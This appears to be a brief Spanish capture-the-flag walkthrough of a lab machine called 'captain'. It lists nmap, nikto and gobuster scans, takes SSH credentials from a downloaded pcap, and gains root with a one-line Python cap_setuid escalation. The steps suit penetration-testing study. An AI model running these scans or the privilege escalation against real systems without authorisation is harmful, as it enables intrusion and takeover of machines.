nmap -A -p- -oA captain 10.129.183.97 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA captain 10.129.183.97

nmap -sU -O -p- -oA captain-udp 10.129.183.97

nikto -h 10.129.183.92:80

gobuster dir -k -u http://10.129.183.97/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

De los puertos que se encuentran despues de escanear la ip vemos que ftp es uno de ellos.

ftp 10.129.183.97

nc -nv 10.129.183.97 22

Parece que el puerto 21-22 no es una buena opcion para empezar.

Pasted image 20210714081014.png

Pasted image 20210714081227.png

Vamos a http://10.129.183.97 Vemos que Nathan es un usuario

Pasted image 20210714081514.png

Vemos el resultado http://10.129.183.97/ip

Pasted image 20210714081616.png

http://10.129.183.97/netstat

Pasted image 20210714081649.png

http://10.129.183.97/data/0

Pasted image 20210714081917.png

Bajamos el pcap y lo vemos en wireshark

Pasted image 20210714082325.png

ssh nathan@10.129.183.97

Con las credenciales que se encontro en el pcap

Pasted image 20210714082744.png

getcap -r / 2>/dev/null

Pasted image 20210714082811.png

python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'

boxes

copyright©2022 Cu3rv0x all rights reserved